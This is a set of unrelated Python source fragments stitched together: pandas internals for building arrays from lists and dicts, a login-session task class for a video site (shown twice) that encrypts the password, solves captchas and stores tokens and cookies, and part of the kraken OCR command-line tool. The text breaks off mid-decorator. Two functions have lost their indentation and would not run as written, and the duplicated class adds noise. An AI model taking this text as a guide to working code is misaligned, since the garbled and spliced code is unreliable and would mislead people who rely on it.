        pass_data = [x for x in data if isinstance(x, (ABCSeries, ABCDataFrame))]
        columns = get_objs_combined_axis(pass_data, sort=False)
    # Cache indexers keyed by id() of the index object, since many Series
    # often share the exact same Index instance.
    indexer_cache: dict[int, np.ndarray] = {}
    aligned_values = []
    for s in data:
        index = getattr(s, "index", None)
        if index is None:
            index = default_index(len(s))
        if id(index) in indexer_cache:
            indexer = indexer_cache[id(index)]
        else:
            indexer = indexer_cache[id(index)] = index.get_indexer(columns)
        values = extract_array(s, extract_numpy=True)
        aligned_values.append(algorithms.take_nd(values, indexer))
    # error: Argument 1 to "vstack" has incompatible type "List[ExtensionArray]";
    # expected "Sequence[Union[Union[int, float, complex, str, bytes, generic],
    # Sequence[Union[int, float, complex, str, bytes, generic]],
    # Sequence[Sequence[Any]], _SupportsArray]]"
    content = np.vstack(aligned_values)  # type: ignore[arg-type]
    return content, columns
def _list_of_dict_to_arrays(
    data: list[dict],
    columns: Index | None,
) -> tuple[np.ndarray, Index]:
    """
    Convert list of dicts to numpy arrays
    if `columns` is not passed, column names are inferred from the records
    - for OrderedDict and dicts, the column names match
      the key insertion-order from the first record to the last.
    - For other kinds of dict-likes, the keys are lexically sorted.
    Parameters
    ----------
    data : iterable
        collection of records (OrderedDict, dict)
    columns: iterables or None
    Returns
    -------
    content : np.ndarray[object, ndim=2]
    columns : Index
    """
    if columns is None:
        # Keys keep insertion order when every record is a plain dict;
        # otherwise fall back to lexical sorting.
        key_lists = (list(record.keys()) for record in data)
        sort_keys = not any(isinstance(record, dict) for record in data)
        pre_cols = lib.fast_unique_multiple_list_gen(key_lists, sort=sort_keys)
        columns = ensure_index(pre_cols)
    # Normalize derived mapping types to plain dicts for the C routine.
    records = [record if type(record) is dict else dict(record) for record in data]
    content = lib.dicts_to_array(records, list(columns))
    return content, columns
def _finalize_columns_and_data(
    content: np.ndarray,  # ndim == 2
    columns: Index | None,
    dtype: DtypeObj | None,
) -> tuple[list[ArrayLike], Index]:
    """
    Validate/derive the columns and soft-cast object-dtype columns.
    """
    contents = list(content.T)
    try:
        columns = _validate_or_indexify_columns(contents, columns)
    except AssertionError as err:
        # GH#26429 do not raise user-facing AssertionError
        raise ValueError(err) from err
    if contents and contents[0].dtype == np.object_:
        contents = _convert_object_array(contents, dtype=dtype)
    return contents, columns
def _validate_or_indexify_columns(
content: list[np.ndarray], columns: Index | None
) -> Index:
"""
If columns is None, make numbers as column names; Otherwise, validate that
columns have valid length.
Parameters
----------
content : list of np.ndarrays
columns : Index or None
Returns
-------
Index
If columns is None, assign positional column index value as columns.
Raises
------
1. AssertionError when content is not composed of list of lists, and if
length of columns is not equal to length of content.
2. ValueError when content is list of lists, but length of each sub-list
is not equal
3. ValueError when content is list of lists, but length of sub-list is
not equal to length of content
"""
if columns is None:
columns = default_index(len(content))
else:
# Add mask for data which is composed of list of lists
is_mi_list = isinstance(columns, list) and all(
isinstance(col, list) for col in columns
)
if not is_mi_list and len(columns) != len(content): # pragma: no cover
# caller's responsibility to check for this...
raise AssertionError(
f"{len(columns)} columns passed, passed data had "
f"{len(content)} columns"
)
elif is_mi_list:
# check if nested list column, length of each sub-list should be equal
if len({len(col) for col in columns}) > 1:
raise ValueError(
"Length of columns passed for MultiIndex columns is different"
)
# if columns is not empty and length of sublist is not equal to content
elif columns and len(columns[0]) != len(content):
raise ValueError(
f"{len(columns[0])} columns passed, passed data had "
f"{len(content)} columns"
)
return columns
def _convert_object_array(
    content: list[np.ndarray], dtype: DtypeObj | None
) -> list[ArrayLike]:
    """
    Soft-convert a list of object-dtype arrays to better dtypes.
    Parameters
    ----------
    content: List[np.ndarray]
    dtype: np.dtype or ExtensionDtype
    Returns
    -------
    List[ArrayLike]
    """
    def _soft_convert(arr):
        # Skip inference only when object dtype was explicitly requested.
        if dtype != np.dtype("O"):
            arr = lib.maybe_convert_objects(arr)
            arr = maybe_cast_to_datetime(arr, dtype)
        return arr
    return [_soft_convert(arr) for arr in content]
# ---------------------------------------------------------------------
import base64
from urllib import parse
import rsa
from reqs.login import LoginReq
from .base_class import Forced, Wait, Multi
class LoginTask(Forced, Wait, Multi):
    """Keeps a user session alive: validates, refreshes, or re-acquires tokens."""
    TASK_NAME = 'null'

    @staticmethod
    async def check(_):
        # NOTE(review): the (-2, None) tuple is a scheduler sentinel; its exact
        # meaning is defined by the task framework -- confirm there.
        return (-2, None),

    @staticmethod
    async def work(user):
        # Kept as a thin wrapper: if this coroutine is cancelled, we simply
        # return, so the user's own explicit login calls are unaffected.
        await LoginTask.handle_login_status(user)

    @staticmethod
    async def handle_login_status(user):
        """Ensure the session is valid; return True or the result of login()."""
        if not user.is_online():
            return await LoginTask.login(user)
        if not (await LoginTask.is_token_usable(user)):
            if not (await LoginTask.refresh_token(user)):
                return await LoginTask.login(user)
            else:
                # Refresh succeeded; verify the refreshed token actually works.
                if not (await LoginTask.is_token_usable(user)):
                    return await LoginTask.login(user)
        return True

    @staticmethod
    async def is_token_usable(user):
        """Return True when the stored access token is still accepted."""
        json_rsp = await LoginReq.is_token_usable(user)
        if not json_rsp['code'] and 'mid' in json_rsp['data']:
            user.info('token有效期检查: 仍有效')
            return True
        user.info('token可能过期')
        return False

    @staticmethod
    async def refresh_token(user):
        """Exchange the refresh token for new credentials; True on success."""
        json_rsp = await LoginReq.refresh_token(user)
        if not json_rsp['code'] and 'mid' in json_rsp['data']['token_info']:
            user.info('token刷新成功')
            data = json_rsp['data']
            access_key = data['token_info']['access_token']
            refresh_token = data['token_info']['refresh_token']
            cookies = data['cookie_info']['cookies']
            # BUGFIX: reusing single quotes inside a single-quoted f-string is a
            # SyntaxError before Python 3.12; use double quotes for the keys.
            list_cookies = [f'{i["name"]}={i["value"]}' for i in cookies]
            cookie = ';'.join(list_cookies)
            login_data = {
                'csrf': cookies[0]['value'],
                'access_key': access_key,
                'refresh_token': refresh_token,
                'cookie': cookie
            }
            user.update_login_data(login_data)
            return True
        return False

    @staticmethod
    async def login(user):
        """Perform a full username/password login, solving captchas as needed."""
        name = user.name
        password = user.password
        json_rsp = await LoginReq.fetch_key(user)
        data = json_rsp['data']
        # The password is prefixed with the server-provided hash and
        # RSA-encrypted with the server's public key.
        pubkey = rsa.PublicKey.load_pkcs1_openssl_pem(data['key'])
        crypto_password = base64.b64encode(
            rsa.encrypt((data['hash'] + password).encode('utf-8'), pubkey)
        )
        url_password = parse.quote_plus(crypto_password)
        url_name = parse.quote_plus(name)
        json_rsp = await LoginReq.login(user, url_name, url_password)
        # Code -105 triggers the captcha branch; retry until accepted.
        while json_rsp['code'] == -105:
            binary_rsp = await LoginReq.fetch_capcha(user)
            captcha = await LoginReq.cnn_captcha(user, binary_rsp)
            json_rsp = await LoginReq.login(user, url_name, url_password, captcha)
        if not json_rsp['code'] and not json_rsp['data']['status']:
            data = json_rsp['data']
            access_key = data['token_info']['access_token']
            refresh_token = data['token_info']['refresh_token']
            dict_cookies = {i["name"]: i["value"] for i in data['cookie_info']['cookies']}
            cookie = ';'.join(f'{key}={value}' for key, value in dict_cookies.items())
            login_data = {
                'csrf': dict_cookies['bili_jct'],
                'access_key': access_key,
                'refresh_token': refresh_token,
                'cookie': cookie,
                'uid': data['token_info']['mid']
            }
            user.update_login_data(login_data)
            user.info('登陆成功')
            return True
        else:
            # Store the raw response in csrf so the failure is inspectable later.
            login_data = {
                'csrf': f'{json_rsp}',
                'access_key': '',
                'refresh_token': '',
                'cookie': '',
                'uid': 'NULL'
            }
            user.update_login_data(login_data)
            user.info(f'登录失败,错误信息为:{json_rsp}')
            return False
import base64
from urllib import parse
import rsa
from reqs.login import LoginReq
from .base_class import Forced, Wait, Multi
class LoginTask(Forced, Wait, Multi):
    """Keeps a user session alive: validates, refreshes, or re-acquires tokens."""
    TASK_NAME = 'null'
    @staticmethod
    async def check(_):
        # NOTE(review): the (-2, None) tuple is a scheduler sentinel; its exact
        # meaning is defined by the task framework -- confirm there.
        return (-2, None),
    @staticmethod
    async def work(user):
        # Kept as a thin wrapper: if this coroutine is cancelled, we simply
        # return, so the user's own explicit login calls are unaffected.
        await LoginTask.handle_login_status(user)
    @staticmethod
    async def handle_login_status(user):
        """Ensure the session is valid; return True or the result of login()."""
        if not user.is_online():
            return await LoginTask.login(user)
        if not (await LoginTask.is_token_usable(user)):
            if not (await LoginTask.refresh_token(user)):
                return await LoginTask.login(user)
            else:
                # Refresh succeeded; verify the refreshed token actually works.
                if not (await LoginTask.is_token_usable(user)):
                    return await LoginTask.login(user)
        return True
    @staticmethod
    async def is_token_usable(user):
        """Return True when the stored access token is still accepted."""
        json_rsp = await LoginReq.is_token_usable(user)
        if not json_rsp['code'] and 'mid' in json_rsp['data']:
            user.info('token有效期检查: 仍有效')
            return True
        user.info('token可能过期')
        return False
    @staticmethod
    async def refresh_token(user):
        """Exchange the refresh token for new credentials; True on success."""
        json_rsp = await LoginReq.refresh_token(user)
        if not json_rsp['code'] and 'mid' in json_rsp['data']['token_info']:
            user.info('token刷新成功')
            data = json_rsp['data']
            access_key = data['token_info']['access_token']
            refresh_token = data['token_info']['refresh_token']
            cookies = data['cookie_info']['cookies']
            list_cookies = [f'{i["name"]}={i["value"]}' for i in cookies]
            cookie = ';'.join(list_cookies)
            login_data = {
                'csrf': cookies[0]['value'],
                'access_key': access_key,
                'refresh_token': refresh_token,
                'cookie': cookie
            }
            user.update_login_data(login_data)
            return True
        return False
    @staticmethod
    async def login(user):
        """Perform a full username/password login, solving captchas as needed."""
        name = user.name
        password = user.password
        json_rsp = await LoginReq.fetch_key(user)
        data = json_rsp['data']
        # The password is prefixed with the server-provided hash and
        # RSA-encrypted with the server's public key.
        pubkey = rsa.PublicKey.load_pkcs1_openssl_pem(data['key'])
        crypto_password = base64.b64encode(
            rsa.encrypt((data['hash'] + password).encode('utf-8'), pubkey)
        )
        url_password = parse.quote_plus(crypto_password)
        url_name = parse.quote_plus(name)
        json_rsp = await LoginReq.login(user, url_name, url_password)
        # Code -105 triggers the captcha branch; retry until accepted.
        while json_rsp['code'] == -105:
            binary_rsp = await LoginReq.fetch_capcha(user)
            captcha = await LoginReq.cnn_captcha(user, binary_rsp)
            json_rsp = await LoginReq.login(user, url_name, url_password, captcha)
        if not json_rsp['code'] and not json_rsp['data']['status']:
            data = json_rsp['data']
            access_key = data['token_info']['access_token']
            refresh_token = data['token_info']['refresh_token']
            dict_cookies = {i["name"]: i["value"] for i in data['cookie_info']['cookies']}
            cookie = ';'.join(f'{key}={value}' for key, value in dict_cookies.items())
            login_data = {
                'csrf': dict_cookies['bili_jct'],
                'access_key': access_key,
                'refresh_token': refresh_token,
                'cookie': cookie,
                'uid': data['token_info']['mid']
            }
            user.update_login_data(login_data)
            user.info('登陆成功')
            return True
        else:
            # Store the raw response in csrf so the failure is inspectable later.
            login_data = {
                'csrf': f'{json_rsp}',
                'access_key': '',
                'refresh_token': '',
                'cookie': '',
                'uid': 'NULL'
            }
            # print(dic_saved_session)
            user.update_login_data(login_data)
            user.info(f'登录失败,错误信息为:{json_rsp}')
            return False
# ---------------------------------------------------------------------
# -*- coding: utf-8 -*-
#
# Copyright 2015 Benjamin Kiessling
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
kraken.kraken
~~~~~~~~~~~~~
Command line drivers for recognition functionality.
"""
import os
import warnings
import logging
import pkg_resources
from typing import Dict, Union, List, cast, Any, IO, Callable
from functools import partial
from PIL import Image
import click
from kraken.lib import log
# Silence UserWarnings and route remaining warnings through logging.
warnings.simplefilter('ignore', UserWarning)
logging.captureWarnings(True)
logger = logging.getLogger('kraken')
APP_NAME = 'kraken'
# Default baseline segmentation model shipped inside the package.
SEGMENTATION_DEFAULT_MODEL = pkg_resources.resource_filename(__name__, 'blla.mlmodel')
DEFAULT_MODEL = ['en-default.mlmodel']
# Location where legacy ocropus models are expected on disk.
LEGACY_MODEL_DIR = '/usr/local/share/ocropus'
# raise default max image size to 20k * 20k pixels
Image.MAX_IMAGE_PIXELS = 20000 ** 2
def message(msg: str, **styles) -> None:
    """Echo a status message unless verbose logging is taking over the output."""
    # Level 30 == WARNING; anything chattier means log lines replace the UI.
    quiet_logging = logger.getEffectiveLevel() >= 30
    if quiet_logging:
        click.secho(msg, **styles)
def get_input_parser(type_str: str) -> Callable[[str], Dict[str, Any]]:
    """
    Return the parser callable for an input format.

    Parameters
    ----------
    type_str : str
        One of 'alto', 'page', 'xml', or 'image'.

    Raises
    ------
    ValueError
        If ``type_str`` is not a known input format.
    """
    if type_str == 'alto':
        from kraken.lib.xml import parse_alto
        return parse_alto
    elif type_str == 'page':
        from kraken.lib.xml import parse_page
        return parse_page
    elif type_str == 'xml':
        from kraken.lib.xml import parse_xml
        return parse_xml
    elif type_str == 'image':
        return Image.open
    # Previously this fell through and implicitly returned None, producing a
    # confusing "'NoneType' object is not callable" at the call site.
    raise ValueError(f'Unknown input format type: {type_str}')
# chainable functions of functional components (binarization/segmentation/recognition)
def binarizer(threshold, zoom, escale, border, perc, range, low, high, input, output) -> None:
    """
    Pipeline stage: binarize ``input`` with kraken's nlbin and write the
    result to ``output`` (image, or serialized document for the final stage).
    """
    from kraken import binarization
    ctx = click.get_current_context()
    if ctx.meta['first_process']:
        if ctx.meta['input_format_type'] != 'image':
            # XML inputs carry the source image path in their 'image' field.
            input = get_input_parser(ctx.meta['input_format_type'])(input)['image']
        ctx.meta['first_process'] = False
    else:
        raise click.UsageError('Binarization has to be the initial process.')
    try:
        im = Image.open(input)
    except IOError as e:
        raise click.BadParameter(str(e))
    message('Binarizing\t', nl=False)
    try:
        res = binarization.nlbin(im, threshold, zoom, escale, border, perc, range,
                                 low, high)
        if ctx.meta['last_process'] and ctx.meta['output_mode'] != 'native':
            # Final stage with a structured serializer: save the image next to
            # the serialized (empty) document that references it.
            with click.open_file(output, 'w', encoding='utf-8') as fp:
                fp = cast(IO[Any], fp)
                logger.info('Serializing as {} into {}'.format(ctx.meta['output_mode'], output))
                res.save(f'{output}.png')
                from kraken import serialization
                fp.write(serialization.serialize([],
                                                 image_name=f'{output}.png',
                                                 image_size=res.size,
                                                 template=ctx.meta['output_mode']))
        else:
            form = None
            ext = os.path.splitext(output)[1]
            if ext in ['.jpg', '.jpeg', '.JPG', '.JPEG', '']:
                form = 'png'
                if ext:
                    logger.warning('jpeg does not support 1bpp images. Forcing to png.')
            res.save(output, format=form)
            # Later stages use the binarized image as their base image.
            ctx.meta['base_image'] = output
    except Exception:
        message('\u2717', fg='red')
        raise
    message('\u2713', fg='green')
def segmenter(legacy, model, text_direction, scale, maxcolseps, black_colseps,
              remove_hlines, pad, mask, device, input, output) -> None:
    """
    Pipeline stage: segment ``input`` into text lines/regions, using either
    the legacy box segmenter or the trainable baseline (blla) segmenter, and
    write JSON or a serialized document to ``output``.
    """
    import json
    from kraken import pageseg
    from kraken import blla
    ctx = click.get_current_context()
    if ctx.meta['first_process']:
        if ctx.meta['input_format_type'] != 'image':
            # XML inputs carry the source image path in their 'image' field.
            input = get_input_parser(ctx.meta['input_format_type'])(input)['image']
        ctx.meta['first_process'] = False
    if 'base_image' not in ctx.meta:
        ctx.meta['base_image'] = input
    try:
        im = Image.open(input)
    except IOError as e:
        raise click.BadParameter(str(e))
    if mask:
        try:
            mask = Image.open(mask)
        except IOError as e:
            raise click.BadParameter(str(e))
    message('Segmenting\t', nl=False)
    try:
        if legacy:
            res = pageseg.segment(im,
                                  text_direction,
                                  scale,
                                  maxcolseps,
                                  black_colseps,
                                  no_hlines=remove_hlines,
                                  pad=pad,
                                  mask=mask)
        else:
            res = blla.segment(im, text_direction, mask=mask, model=model, device=device)
    except Exception:
        message('\u2717', fg='red')
        raise
    if ctx.meta['last_process'] and ctx.meta['output_mode'] != 'native':
        # Final stage with a structured serializer: wrap the segmentation in
        # empty ocr_records so the chosen template can render it.
        with click.open_file(output, 'w', encoding='utf-8') as fp:
            fp = cast(IO[Any], fp)
            logger.info('Serializing as {} into {}'.format(ctx.meta['output_mode'], output))
            from kraken import serialization
            from kraken.rpred import ocr_record
            if 'type' in res and res['type'] == 'baselines':
                records = [ocr_record('', '', '', bl) for bl in res['lines']]
            else:
                records = []
                for line in res['boxes']:
                    # Convert the flat box coordinates into a polygon.
                    xmin, xmax = min(line[::2]), max(line[::2])
                    ymin, ymax = min(line[1::2]), max(line[1::2])
                    records.append(ocr_record('', [], [], [[xmin, ymin], [xmin, ymax], [xmax, ymax], [xmax, ymin]]))
            fp.write(serialization.serialize(records,
                                             image_name=ctx.meta['base_image'],
                                             image_size=im.size,
                                             regions=res['regions'] if 'regions' in res else None,
                                             template=ctx.meta['output_mode']))
    else:
        # Intermediate stage (or native output): plain JSON for the next stage.
        with click.open_file(output, 'w') as fp:
            fp = cast(IO[Any], fp)
            json.dump(res, fp)
    message('\u2713', fg='green')
def recognizer(model, pad, no_segmentation, bidi_reordering, script_ignore, input, output) -> None:
    """
    Pipeline stage: run text recognition over a segmented image and write
    plain text or a serialized document to ``output``.

    The segmentation is taken, in order of preference, from an XML input
    document, a JSON file produced by a previous `segment` stage, or — with
    ``no_segmentation`` — a single box covering the whole image.
    """
    import json
    from kraken import rpred
    ctx = click.get_current_context()
    bounds = None
    if 'base_image' not in ctx.meta:
        ctx.meta['base_image'] = input
    if ctx.meta['first_process']:
        if ctx.meta['input_format_type'] != 'image':
            doc = get_input_parser(ctx.meta['input_format_type'])(input)
            ctx.meta['base_image'] = doc['image']
            doc['text_direction'] = 'horizontal-lr'
            if doc['base_dir'] and bidi_reordering is True:
                # BUGFIX: the original f-string reused single quotes inside a
                # single-quoted literal — a SyntaxError before Python 3.12.
                message(f'Setting base text direction for BiDi reordering to {doc["base_dir"]} (from XML input file)')
                bidi_reordering = doc['base_dir']
            bounds = doc
    try:
        im = Image.open(ctx.meta['base_image'])
    except IOError as e:
        raise click.BadParameter(str(e))
    if not bounds and ctx.meta['base_image'] != input:
        # Segmentation produced by an earlier stage was written as JSON.
        with click.open_file(input, 'r') as fp:
            try:
                fp = cast(IO[Any], fp)
                bounds = json.load(fp)
            except ValueError as e:
                raise click.UsageError(f'{input} invalid segmentation: {str(e)}')
    elif not bounds:
        if no_segmentation:
            # Treat the entire image as a single text line.
            bounds = {'script_detection': False,
                      'text_direction': 'horizontal-lr',
                      'boxes': [(0, 0) + im.size]}
        else:
            raise click.UsageError('No line segmentation given. Add one with the input or run `segment` first.')
    elif no_segmentation:
        logger.warning('no_segmentation mode enabled but segmentation defined. Ignoring --no-segmentation option.')
    scripts = set()
    # script detection
    if 'script_detection' in bounds and bounds['script_detection']:
        it = rpred.mm_rpred(model, im, bounds, pad,
                            bidi_reordering=bidi_reordering,
                            script_ignore=script_ignore)
    else:
        it = rpred.rpred(model['default'], im, bounds, pad,
                         bidi_reordering=bidi_reordering)
    preds = []
    with log.progressbar(it, label='Processing') as bar:
        for pred in bar:
            preds.append(pred)
    ctx = click.get_current_context()
    with click.open_file(output, 'w', encoding='utf-8') as fp:
        fp = cast(IO[Any], fp)
        # BUGFIX: same pre-3.12 nested-quote SyntaxError as above.
        message(f'Writing recognition results for {ctx.meta["orig_file"]}\t', nl=False)
        logger.info('Serializing as {} into {}'.format(ctx.meta['output_mode'], output))
        if ctx.meta['output_mode'] != 'native':
            from kraken import serialization
            fp.write(serialization.serialize(preds, ctx.meta['base_image'],
                                             Image.open(ctx.meta['base_image']).size,
                                             ctx.meta['text_direction'],
                                             scripts,
                                             bounds['regions'] if 'regions' in bounds else None,
                                             ctx.meta['output_mode']))
        else:
            fp.write('\n'.join(s.prediction for s in preds))
        message('\u2713', fg='green')
@click.group(chain=True)
@click.version_option()
@click.option('-i', '--input',
              type=(click.Path(exists=True), # type: ignore
              click.Path(writable=True)),
              multiple=True,
              help='Input-output file pairs. Each input file (first argument) is mapped to one '
              'output file (second argument), e.g. `-i input.png output.txt`')
@click.option('-I', '--batch-input', multiple=True, help='Glob expression to add multiple files at once.')
@click.option('-o', '--suffix', default='', show_default=True,
              help='Suffix for output files from batch and PDF inputs.')
@click.option('-v', '--verbose', default=0, count=True, show_default=True)
@click.option('-f', '--format-type', type=click.Choice(['image', 'alto', 'page', 'pdf', 'xml']), default='image',
              help='Sets the default input type. In image mode inputs are image '
                   'files, alto/page expects XML files in the respective format, pdf '
                   'expects PDF files with numbered suffixes added to output file '
                   'names as needed.')
@click.option('-p', '--pdf-format', default='{src}_{idx:06d}',
              show_default=True,
              help='Format for output of PDF files. valid fields '
                   'are `src` (source file), `idx` (page number), and `uuid` (v4 uuid). '
                   '`-o` suffixes are appended to this format string.')
# The serializer options are mutually exclusive flags sharing one destination.
@click.option('-h', '--hocr', 'serializer',
              help='Switch between hOCR, ALTO, abbyyXML, PageXML or "native" '
                   'output. Native are plain image files for image, JSON for '
                   'segmentation, and text for transcription output.',
              flag_value='hocr')
@click.option('-a', '--alto', 'serializer', flag_value='alto')
@click.option('-y', '--abbyy', 'serializer', flag_value='abbyyxml')
@click.option('-x', '--pagexml', 'serializer', flag_value='pagexml')
@click.option('-n', '--native', 'serializer', flag_value='native', default=True,
              show_default=True)
@click.option('-d', '--device', default='cpu', show_default=True,
              help='Select device to use (cpu, cuda:0, cuda:1, ...)')
@click.option('-r', '--raise-on-error/--no-raise-on-error', default=False, show_default=True,
              help='Raises the exception that caused processing to fail in the case of an error')
def cli(input, batch_input, suffix, verbose, format_type, pdf_format, serializer, device, raise_on_error):
    """
    Base command for recognition functionality.
    Inputs are defined as one or more pairs `-i input_file output_file`
    followed by one or more chainable processing commands. Likewise, verbosity
    is set on all subcommands with the `-v` switch.
    """
    ctx = click.get_current_context()
    ctx.meta['device'] = device
    # PDFs are rasterized to images first, so later stages see image input.
    ctx.meta['input_format_type'] = format_type if format_type != 'pdf' else 'image'
    ctx.meta['raise_failed'] = raise_on_error
    ctx.meta['output_mode'] = serializer
    # 0 -> WARNING (30), -v -> INFO (20), -vv and beyond -> DEBUG (10).
    log.set_logger(logger, level=30 - min(10 * verbose, 20))
@cli.resultcallback()
def process_pipeline(subcommands, input, batch_input, suffix, verbose, format_type, pdf_format, **args):
    """
    Helper function calling the partials returned by each subcommand and
    placing their respective outputs in temporary files.

    Args:
        subcommands: Partials returned by the chained subcommands; each is
            called as ``task(input=..., output=...)``.
        input: Sequence of ``(input_file, output_file)`` pairs from ``-i``.
        batch_input: Glob expressions from ``-I``, expanded into `input`.
        suffix: Output suffix (``-o``) appended to batch and PDF outputs.
        verbose: Verbosity counter (consumed by `cli`, unused here).
        format_type: Input type; ``pdf`` triggers page extraction below.
        pdf_format: Format string naming extracted PDF pages (fields:
            ``src``, ``idx``, ``uuid``).
    """
    import glob
    import uuid
    import tempfile

    input = list(input)
    # expand batch inputs
    if batch_input and suffix:
        for batch_expr in batch_input:
            for in_file in glob.glob(batch_expr, recursive=True):
                input.append((in_file, '{}{}'.format(os.path.splitext(in_file)[0], suffix)))
    # parse pdfs: rasterize every page to a temporary PNG and substitute the
    # PNG paths for the original inputs.
    if format_type == 'pdf':
        import pyvips
        if not batch_input:
            logger.warning('PDF inputs not added with batch option. Manual output filename will be ignored and `-o` utilized.')
        new_input = []
        num_pages = 0
        # First pass only counts pages so the progress bar has a length.
        for (fpath, _) in input:
            doc = pyvips.Image.new_from_file(fpath, dpi=300, n=-1, access="sequential")
            if 'n-pages' in doc.get_fields():
                num_pages += doc.get('n-pages')
        with log.progressbar(length=num_pages, label='Extracting PDF pages') as bar:
            for (fpath, _) in input:
                try:
                    doc = pyvips.Image.new_from_file(fpath, dpi=300, n=-1, access="sequential")
                    if 'n-pages' not in doc.get_fields():
                        # BUG FIX: the f-prefix was missing, so the literal
                        # text '{fpath}' was logged.
                        logger.warning(f'{fpath} does not contain pages. Skipping.')
                        continue
                    n_pages = doc.get('n-pages')
                    dest_dict = {'idx': -1, 'src': fpath, 'uuid': None}
                    for i in range(0, n_pages):
                        dest_dict['idx'] += 1
                        dest_dict['uuid'] = str(uuid.uuid4())
                        fd, filename = tempfile.mkstemp(suffix='.png')
                        os.close(fd)
                        doc = pyvips.Image.new_from_file(fpath, dpi=300, page=i, access="sequential")
                        # BUG FIX: nested single quotes in the f-string are a
                        # SyntaxError before Python 3.12, and the destination
                        # file name was replaced by a '(unknown)' placeholder.
                        logger.info(f'Saving temporary image {fpath}:{dest_dict["idx"]} to {filename}')
                        doc.write_to_file(filename)
                        new_input.append((filename, pdf_format.format(**dest_dict) + suffix))
                        bar.update(1)
                except pyvips.error.Error:
                    logger.warning(f'{fpath} is not a PDF file. Skipping.')
        input = new_input

    ctx = click.get_current_context()
    for io_pair in input:
        ctx.meta['first_process'] = True
        ctx.meta['last_process'] = False
        ctx.meta['orig_file'] = io_pair[0]
        if 'base_image' in ctx.meta:
            del ctx.meta['base_image']
        # BUG FIX: `fc` is referenced in the finally clause; initialize it so
        # a failure during tempfile creation cannot raise a NameError there.
        fc = []
        try:
            tmps = [tempfile.mkstemp() for _ in subcommands[1:]]
            for tmp in tmps:
                os.close(tmp[0])
            # Chain the subcommands through temporary files:
            # input -> tmp1 -> tmp2 -> ... -> output.
            fc = [io_pair[0]] + [tmp[1] for tmp in tmps] + [io_pair[1]]
            for idx, (task, input, output) in enumerate(zip(subcommands, fc, fc[1:])):
                if len(fc) - 2 == idx:
                    ctx.meta['last_process'] = True
                task(input=input, output=output)
        except Exception as e:
            logger.error(f'Failed processing {io_pair[0]}: {str(e)}')
            if ctx.meta['raise_failed'] is True:
                raise
        finally:
            for f in fc[1:-1]:
                os.unlink(f)
            # clean up temporary PDF image files
            if format_type == 'pdf' and fc:
                logger.debug(f'unlinking {fc[0]}')
                os.unlink(fc[0])
@cli.command('binarize')
@click.option('--threshold', show_default=True, default=0.5, type=click.FLOAT)
@click.option('--zoom', show_default=True, default=0.5, type=click.FLOAT)
@click.option('--escale', show_default=True, default=1.0, type=click.FLOAT)
@click.option('--border', show_default=True, default=0.1, type=click.FLOAT)
@click.option('--perc', show_default=True, default=80, type=click.IntRange(1, 100))
@click.option('--range', show_default=True, default=20, type=click.INT)
@click.option('--low', show_default=True, default=5, type=click.IntRange(1, 100))
@click.option('--high', show_default=True, default=90, type=click.IntRange(1, 100))
def binarize(threshold, zoom, escale, border, perc, range, low, high):
    """
    Binarizes page images.

    Returns a partial of :func:`binarizer` carrying the nlbin parameters;
    the pipeline driver later supplies the ``input``/``output`` paths.
    """
    return partial(binarizer, threshold, zoom, escale, border, perc, range, low, high)
@cli.command('segment')
@click.pass_context
@click.option('-i', '--model',
              default=None,
              show_default=True, type=click.Path(exists=True),
              help='Baseline detection model to use')
@click.option('-x/-bl', '--boxes/--baseline', default=True, show_default=True,
              help='Switch between legacy box segmenter and neural baseline segmenter')
@click.option('-d', '--text-direction', default='horizontal-lr',
              show_default=True,
              type=click.Choice(['horizontal-lr', 'horizontal-rl',
                                 'vertical-lr', 'vertical-rl']),
              help='Sets principal text direction')
@click.option('--scale', show_default=True, default=None, type=click.FLOAT)
@click.option('-m', '--maxcolseps', show_default=True, default=2, type=click.INT)
@click.option('-b/-w', '--black-colseps/--white_colseps', show_default=True, default=False)
@click.option('-r/-l', '--remove_hlines/--hlines', show_default=True, default=True)
@click.option('-p', '--pad', show_default=True, type=(int, int), default=(0, 0),
              help='Left and right padding around lines')
# NOTE(review): '-m' is also used by --maxcolseps above — duplicated short
# option; confirm which declaration is intended to win at parse time.
@click.option('-m', '--mask', show_default=True, default=None,
              type=click.File(mode='rb', lazy=True), help='Segmentation mask '
              'suppressing page areas for line detection. 0-valued image '
              'regions are ignored for segmentation purposes. Disables column '
              'detection.')
def segment(ctx, model, boxes, text_direction, scale, maxcolseps,
            black_colseps, remove_hlines, pad, mask):
    """
    Segments page images into text lines.

    Returns a partial of :func:`segmenter` configured with either the legacy
    box segmenter or (when ``-bl`` is given or a model forces it) the neural
    baseline segmenter.
    """
    # A baseline model is meaningless for the legacy segmenter; force -bl.
    if model and boxes:
        logger.warning(f'Baseline model ({model}) given but legacy segmenter selected. Forcing to -bl.')
        boxes = False
    if boxes is False:
        if not model:
            model = SEGMENTATION_DEFAULT_MODEL
        from kraken.lib.vgsl import TorchVGSLModel
        message(f'Loading ANN {model}\t', nl=False)
        try:
            # `model` is rebound from a path to the loaded TorchVGSLModel.
            model = TorchVGSLModel.load_model(model)
            model.to(ctx.meta['device'])
        except Exception:
            message('\u2717', fg='red')
            ctx.exit(1)
        message('\u2713', fg='green')
    return partial(segmenter, boxes, model, text_direction, scale, maxcolseps,
                   black_colseps, remove_hlines, pad, mask,
                   ctx.meta['device'])
def _validate_mm(ctx, param, value):
"""
Maps model mappings to a dictionary.
"""
model_dict = {'ignore': []} # type: Dict[str, Union[str, List[str]]]
if len(value) == 1 and len(value[0].split(':')) == 1:
model_dict['default'] = value[0]
return model_dict
try:
for m in value:
k, v = m.split(':')
if v == 'ignore':
model_dict['ignore'].append(k) # type: ignore
else:
model_dict[k] = os.path.expanduser(v)
except Exception:
raise click.BadParameter('Mappings must be in format script:model')
return model_dict
@cli.command('ocr')
@click.pass_context
@click.option('-m', '--model', default=DEFAULT_MODEL, multiple=True,
              show_default=True, callback=_validate_mm,
              help='Path to an recognition model or mapping of the form '
              '$script1:$model1. Add multiple mappings to run multi-model '
              'recognition based on detected scripts. Use the default keyword '
              'for adding a catch-all model. Recognition on scripts can be '
              'ignored with the model value ignore.')
@click.option('-p', '--pad', show_default=True, type=click.INT, default=16, help='Left and right '
              'padding around lines')
